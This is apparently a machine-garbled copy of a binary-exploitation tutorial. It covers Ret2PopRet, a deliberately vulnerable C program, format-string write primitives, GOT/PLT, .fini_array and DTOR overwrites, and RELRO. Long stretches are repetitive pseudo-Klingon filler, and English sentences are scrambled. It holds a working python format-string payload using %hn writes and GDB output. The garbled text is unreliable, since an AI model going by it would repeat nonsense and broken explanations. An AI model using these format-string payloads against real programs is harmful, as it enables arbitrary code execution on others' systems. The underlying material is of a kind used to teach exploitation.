'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' ghaH 'e' vay' 'e' vay' g
**Ret2PopRet**
Técnica de Murat
linuxDa'wI' 'e' yIlo' 'ej 'ejatlh 'ej 'oH 'ejatlh, 'ej cha'logh 'ejatlh, 'ej cha'logh, pop-ret 'ej pop-pop-ret, vItlhutlh.
Murat QaQ
linuxDaq DaH jImej 'ej 0xbfffffff bIqIj.
linuxDaq jImej 'ej pIla 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh 'ejatlh
#include <stdion.h>
#include <string.h>
#include <stdlib.h>
int main(int argc, char *argv[]){
int len;
unsigned int l;
char buffer[256];
int i;
len = l = strtoul(argv[1], NULL, 10);
printf("\nL = %u\n", l);
printf("\nLEN = %d\n", len);
if (len >= 256){
printf("\nLongitus excesiva\n");
exit(1);
}
if(strlen(argv[2]) < l)
strcpy(buffer, argv[2]);
else
printf("\nIntento de hack\n");
return 0;
}
Format Strings
In C printf is function that can be used to print some string. The first parameter this function expects is the raw text with the formatters. The following parameters expected are the values to substitute the formatters from the raw text.
The vulnerability appears when an attacker text is put as the first argument to this function. The attacker will be able to craft a special input abusing the printf format string capabilities to write any data in any address. Being able this way to execute arbitrary code.
Fomatters:
%08x —> 8 hex bytes
%d —> Entire
%u —> Unsigned
%s —> String
%n —> Number of written bytes
%hn —> Occupies 2 bytes instead of 4
<n>$X —> Direct access, Example: ("%3$d", var1, var2, var3) —> Access to var3
%n writes the number of written bytes in the indicated address. Writing as much bytes as the hex number we need to write is how you can write any data.
%n writes the number of written bytes in the indicated address. Writing as much bytes as the hex number we need to write is how you can write any data.
AAAA%.6000d%4\$n —> Write 6004 in the address indicated by the 4º param
AAAA.%500\$08x —> Param at offset 500
GOT (Global Offsets Table) / PLT (Procedure Linkage Table)
GOT (Global Offsets Table) / PLT (Procedure Linkage Table) jupDajDI' ghaH program lo'laHbe'chugh external functions address table.
objdump -s -j .got ./exec command laH table address ghItlh.
GEF executable loading after, GOT functions see 'ej 'e' gef➤ x/20x 0xDIR_GOT.
GEF debugging session start 'ej got execute GOT table see.
binary GOT functions addresses PLT section function address load ghItlh. exploit GOT entry override goal function later executed with system function PLT address 'e' override GOT function preferably controlled parameters call function.
system script not used, GOT entry system function not have. scenario leak first address system function need.
Procedure Linkage Table ELF file read only table symbols resolution need store. functions called, GOT flow redirect PLT resolve function address write GOT. next time call address function called directly resolve.
PLT addresses objdump -j .plt -d ./vuln_binary see.
Exploit Flow
GOT table function address overwrite later called function goal. address shellcode executable section set ideally, shellcode write executable section able won't.
function arguments user receives function overwrite system function point.
address write, steps done: 2Bytes first writes address 2. $hn used.
HOB 2 higher bytes address called. LOB 2 lower bytes address called.
format string works, write first smallest [HOB, LOB] then other one.
HOB < LOB
[address+2][address]%.[HOB-8]x%[offset]\$hn%.[LOB-HOB]x%[offset+1]
HOB > LOB
[address+2][address]%.[LOB-8]x%[offset+1]\$hn%.[HOB-LOB]x%[offset]
HOB LOB HOB_shellcode-8 NºParam_dir_HOB LOB_shell-HOB_shell NºParam_dir_LOB
`python -c 'print "\x26\x97\x04\x08"+"\x24\x97\x04\x08"+ "%.49143x" + "%4$hn" + "%.15408x" + "%5$hn"'`
Format String Exploit Template
format-strings GOT template exploit find here:
{% content-ref url="format-strings-template.md" %} format-strings-template.md {% endcontent-ref %}
.fini_array
structure functions called program finishes. shellcode jumping address call, format string exploit second time main go back need interesting.
objdump -s -j .fini_array ./greeting
./greeting: file format elf32-i386
Contents of section .fini_array:
8049934 a0850408
#Put your address in 0x8049934
ghItlhvam won't lu'be' eternal loop vaj vaj canary notice, stack end corrupted 'ej function recalled vaj. So vuln execution 1 more have able.
Format Strings to Dump Content
Format string content dump abused be can program memory from.
Example following situation flag pointing stack variable local is. If find memory in where flag the pointer is, can printf access that address and flag the print:
So, flag 0xffffcf4c
And leak the pointer flag the 8th parameter is:
So, accessing 8th parameter flag the get can:
Note previous exploit the following realising content leak can pointers set printf the section executable is loaded and dump it entirely!
DTOR
{% hint style="danger" %} Nowadays binary a dtor section find to weird very. {% endhint %}
Destructor functions are executed program finishes.
If write address shellcode __DTOR_END__ to, that executed will programs ends.
Get address section this with:
objdump -s -j .dtors /exec
rabin -s /exec | grep “__DTOR”
DTOR qutlh ghItlh ffffffff je 00000000 ghItlh 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' **'e'
Relro
Relro (Read only Relocation) jatlh memory permissions vItlhutlh similar to NX. vaj relro vItlhutlh chegh things read only so maH jatlhbe' to. commonly vISovbe' 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' v
gef➤ vmmap
Start End Offset Perm Path
0x0000555555554000 0x0000555555555000 0x0000000000000000 r-- /tmp/tryc
0x0000555555555000 0x0000555555556000 0x0000000000001000 r-x /tmp/tryc
0x0000555555556000 0x0000555555557000 0x0000000000002000 r-- /tmp/tryc
0x0000555555557000 0x0000555555558000 0x0000000000002000 r-- /tmp/tryc
0x0000555555558000 0x0000555555559000 0x0000000000003000 rw- /tmp/tryc
0x0000555555559000 0x000055555557a000 0x0000000000000000 rw- [heap]
0x00007ffff7dcb000 0x00007ffff7df0000 0x0000000000000000 r-- /usr/lib/x86_64-linux-gnu/libc-2.29.so
0x00007ffff7df0000 0x00007ffff7f63000 0x0000000000025000 r-x /usr/lib/x86_64-linux-gnu/libc-2.29.so
0x00007ffff7f63000 0x00007ffff7fac000 0x0000000000198000 r-- /usr/lib/x86_64-linux-gnu/libc-2.29.so
0x00007ffff7fac000 0x00007ffff7faf000 0x00000000001e0000 r-- /usr/lib/x86_64-linux-gnu/libc-2.29.so
0x00007ffff7faf000 0x00007ffff7fb2000 0x00000000001e3000 rw- /usr/lib/x86_64-linux-gnu/libc-2.29.so
0x00007ffff7fb2000 0x00007ffff7fb8000 0x0000000000000000 rw-
0x00007ffff7fce000 0x00007ffff7fd1000 0x0000000000000000 r-- [vvar]
0x00007ffff7fd1000 0x00007ffff7fd2000 0x0000000000000000 r-x [vdso]
0x00007ffff7fd2000 0x00007ffff7fd3000 0x0000000000000000 r-- /usr/lib/x86_64-linux-gnu/ld-2.29.so
0x00007ffff7fd3000 0x00007ffff7ff4000 0x0000000000001000 r-x /usr/lib/x86_64-linux-gnu/ld-2.29.so
0x00007ffff7ff4000 0x00007ffff7ffc000 0x0000000000022000 r-- /usr/lib/x86_64-linux-gnu/ld-2.29.so
0x00007ffff7ffc000 0x00007ffff7ffd000 0x0000000000029000 r-- /usr/lib/x86_64-linux-gnu/ld-2.29.so
0x00007ffff7ffd000 0x00007ffff7ffe000 0x000000000002a000 rw- /usr/lib/x86_64-linux-gnu/ld-2.29.so
0x00007ffff7ffe000 0x00007ffff7fff000 0x0000000000000000 rw-
0x00007ffffffde000 0x00007ffffffff000 0x0000000000000000 rw- [stack]
0xffffffffff600000 0xffffffffff601000 0x0000000000000000 r-x [vsyscall]
gef➤ p fgets
$2 = {char *(char *, int, FILE *)} 0x7ffff7e4d100 <_IO_fgets>
gef➤ search-pattern 0x7ffff7e4d100
[+] Searching '\x00\xd1\xe4\xf7\xff\x7f' in memory
[+] In '/tmp/tryc'(0x555555557000-0x555555558000), permission=r--
0x555555557fd0 - 0x555555557fe8 → "\x00\xd1\xe4\xf7\xff\x7f[...]"
ghItlhmeH:
relro jatlh: relro jatlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro 